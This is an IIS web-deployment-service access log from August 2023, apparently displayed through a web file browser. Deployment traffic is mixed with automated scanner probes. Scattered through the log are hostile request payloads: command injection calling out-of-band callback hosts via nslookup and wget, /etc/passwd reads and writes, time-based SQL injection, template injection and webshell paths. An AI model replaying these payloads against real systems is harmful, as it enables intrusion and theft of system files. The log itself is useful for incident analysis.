????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230803.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-03 00:40:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-03 00:40:17 103.153.214.94 GET / - 8172 - 162.216.149.228 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-03 01:04:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-03 01:04:18 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 27 2023-08-03 01:04:18 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 54 2023-08-03 01:04:18 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19 2023-08-03 01:04:18 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=6b1d9e94-365e-4e0b-a1ef-7b028c6b9d8c;op=Sync - 200 0 0 469 2023-08-03 01:04:18 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 538 2023-08-03 01:04:18 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 8 2023-08-03 01:05:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61193 2023-08-03 01:05:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=6b1d9e94-365e-4e0b-a1ef-7b028c6b9d8c;op=Sync - 200 0 0 61184 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-03 02:24:25 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-03 02:24:25 103.153.214.94 GET /webadmin/script command=|%20nslookup%20cj5gsq24749fn87ofdl0w13m5rqtrp8ig.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60 2023-08-03 02:24:28 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 77 2023-08-03 02:24:37 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 77 2023-08-03 02:27:00 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 90 2023-08-03 02:28:56 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 64 2023-08-03 02:29:03 103.153.214.94 GET /images/logo/logo-eoffice.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 73 2023-08-03 02:40:17 103.153.214.94 POST /api/agent/tabs/agentData - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 95 2023-08-03 02:42:22 103.153.214.94 POST / rest_route=/olistener/new 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 58 2023-08-03 02:42:30 103.153.214.94 GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 62 2023-08-03 02:43:54 103.153.214.94 GET /spip.php page=spip_pass 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 61 2023-08-03 02:47:58 103.153.214.94 GET / url=http://0177.0.0.1/server-status 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 87 2023-08-03 02:48:07 103.153.214.94 GET / host=http://0177.0.0.1/server-status 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 90 2023-08-03 02:48:16 103.153.214.94 GET / file=http://0177.0.0.1/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 230 2023-08-03 02:53:46 103.153.214.94 POST /index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 80 2023-08-03 02:57:56 103.153.214.94 GET /metadata/v1.json - 8172 - 111.90.143.37 - - 404 7 0 89 2023-08-03 03:08:05 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 55 2023-08-03 03:09:03 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 52 2023-08-03 03:09:14 103.153.214.94 GET /manage/webshell/u s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 605 2023-08-03 03:10:25 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 48 2023-08-03 03:14:06 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 46 2023-08-03 03:14:06 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 57 2023-08-03 03:14:06 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 71 2023-08-03 03:14:06 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=c13fe547-9a93-45a8-bf4b-997e40d11406;op=Sync - 200 0 0 361 2023-08-03 03:14:06 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 565 2023-08-03 03:14:06 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 28 2023-08-03 03:15:09 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=c13fe547-9a93-45a8-bf4b-997e40d11406;op=Sync - 200 0 0 61708 2023-08-03 03:15:09 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61823 2023-08-03 03:21:00 103.153.214.94 GET /client/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 90 2023-08-03 03:24:15 103.153.214.94 POST /cgi-bin/logo_extra_upload.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 80 2023-08-03 03:24:21 103.153.214.94 GET /logo/2TSGV4hs47KYIzmVoY6wp11PJcJ.txt - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 79 2023-08-03 03:26:11 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 15 2023-08-03 03:26:11 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2023-08-03 03:26:11 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 22 2023-08-03 03:26:11 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d970f9b4-ae54-4ad6-9483-dbf44ec6129c;op=Sync - 200 0 0 699 2023-08-03 03:26:11 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 871 2023-08-03 03:26:12 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 58 2023-08-03 03:27:14 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=d970f9b4-ae54-4ad6-9483-dbf44ec6129c;op=Sync - 200 0 0 62129 2023-08-03 03:27:14 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62337 2023-08-03 03:28:50 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 171.231.147.222 - - 401 2 5 25 2023-08-03 03:28:50 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 38 2023-08-03 03:28:50 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 38 2023-08-03 03:28:50 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=c35f7316-7bf3-40c9-935b-40b13477700d;op=Sync - 200 0 0 475 2023-08-03 03:28:50 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 659 2023-08-03 03:28:50 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 21 2023-08-03 03:28:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=c35f7316-7bf3-40c9-935b-40b13477700d;op=Sync - 200 0 0 362 2023-08-03 03:28:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 456 2023-08-03 03:29:00 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 24 2023-08-03 03:29:00 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 26 2023-08-03 03:29:02 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1082 2023-08-03 03:29:02 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=1010e2b2-23dc-43d3-93ed-1c356261e08e;op=Sync - 200 0 0 985 2023-08-03 03:29:02 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 29 2023-08-03 03:29:03 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 VS17.0:PublishDialog:WTE17.4.326.54890;sid=1010e2b2-23dc-43d3-93ed-1c356261e08e;op=Sync - 200 0 0 1044 2023-08-03 03:29:03 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 171.231.147.222 - - 200 0 0 1162 2023-08-03 03:30:03 103.153.214.94 GET /manager/radius/server_ping.php ip=127.0.0.1|cat%20/etc/passwd>../../2TSGUmmXr5i3Lkr46PBokzVe999.txt&id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 191 2023-08-03 03:30:09 103.153.214.94 GET /2TSGUmmXr5i3Lkr46PBokzVe999.txt - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 55 2023-08-03 03:30:52 103.153.214.94 GET /AdminPage/conf/runCmd cmd=id 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 67 2023-08-03 03:32:28 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 20 2023-08-03 03:32:28 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 26 2023-08-03 03:32:28 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2023-08-03 03:32:28 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 425 2023-08-03 03:32:28 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=fb4f7acf-47c3-476f-a307-c614420ae80b;op=Sync - 200 0 0 344 2023-08-03 03:32:28 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 11 2023-08-03 03:33:31 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=fb4f7acf-47c3-476f-a307-c614420ae80b;op=Sync - 200 0 0 62377 2023-08-03 03:33:31 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 62423 2023-08-03 03:42:26 103.153.214.94 POST /getcfg.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 90 2023-08-03 03:42:47 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 85 2023-08-03 03:43:43 103.153.214.94 GET /my-account/ alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 66 2023-08-03 03:43:51 103.153.214.94 GET / alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 81 2023-08-03 03:49:30 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 58 2023-08-03 03:49:43 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 218 2023-08-03 03:49:52 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 76 2023-08-03 03:49:59 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 73 2023-08-03 03:50:07 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 371 2023-08-03 03:50:15 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 54 2023-08-03 03:50:23 103.153.214.94 POST /_ignition/execute-solution - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 100 2023-08-03 04:01:38 103.153.214.94 GET /lua/find_prefs.lua.css - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 72 2023-08-03 04:01:41 103.153.214.94 GET /actions/seomatic/meta-container/meta-link-container/ uri={{228*'98'}} 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 94 2023-08-03 04:01:46 103.153.214.94 GET /lua/find_prefs.lua.css - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 83 2023-08-03 04:01:49 103.153.214.94 GET /actions/seomatic/meta-container/all-meta-containers uri={{228*'98'}} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 80 2023-08-03 04:07:02 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 74 2023-08-03 04:19:25 103.153.214.94 GET /data/pbootcms.db - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 58 2023-08-03 04:25:45 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 86 2023-08-03 04:28:48 103.153.214.94 GET /app service=page/SetupCompleted 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 76 2023-08-03 04:28:58 103.153.214.94 POST /app - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 57 2023-08-03 04:29:07 103.153.214.94 POST /app - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 72 2023-08-03 04:29:14 103.153.214.94 POST /app - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 55 2023-08-03 04:29:23 103.153.214.94 POST /app - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 80 2023-08-03 04:29:31 103.153.214.94 POST /app - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 53 2023-08-03 04:29:39 103.153.214.94 GET /app service=page/PrinterList 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 104 2023-08-03 04:39:27 103.153.214.94 GET /search.php search=%22;wget+http%3A%2F%2Fcj5gsq24749fn87ofdl0xnc488xcynhqz.oast.site%27;%22 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 103 2023-08-03 04:39:32 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 59 2023-08-03 04:39:39 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 80 2023-08-03 04:51:56 103.153.214.94 POST /cms/content/list - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 89 2023-08-03 04:51:56 103.153.214.94 POST /xmlrpc - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 57 2023-08-03 05:02:06 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 63 2023-08-03 05:05:09 103.153.214.94 GET /api/experimental/latest_runs - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 82 2023-08-03 05:05:17 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 57 2023-08-03 05:06:57 103.153.214.94 POST /plugin/add - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 87 2023-08-03 05:07:07 103.153.214.94 POST /plugin/customMethod - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 98 2023-08-03 05:17:34 103.153.214.94 POST /zdm/cxf/login - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172/zdm/login_xdm_uc.jsp 404 7 0 90 2023-08-03 05:18:20 103.153.214.94 POST /index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 79 2023-08-03 05:18:27 103.153.214.94 POST /lcms/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 73 2023-08-03 05:23:00 103.153.214.94 GET / pum_action=tools_page_tab_system_info 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 99 2023-08-03 05:23:07 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 61 2023-08-03 05:28:39 103.153.214.94 GET /admin/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 114 2023-08-03 05:35:46 103.153.214.94 GET /prweb/PRAuth/app/default/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 89 2023-08-03 05:36:44 103.153.214.94 POST /account/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 82 2023-08-03 05:36:54 103.153.214.94 POST /opensis/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 55 2023-08-03 05:37:03 103.153.214.94 POST /index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 56 2023-08-03 05:41:00 103.153.214.94 POST /network_test.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 83 2023-08-03 05:44:20 103.153.214.94 POST /Config/SaveUploadedHotspotLogoFile - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 83 2023-08-03 05:44:27 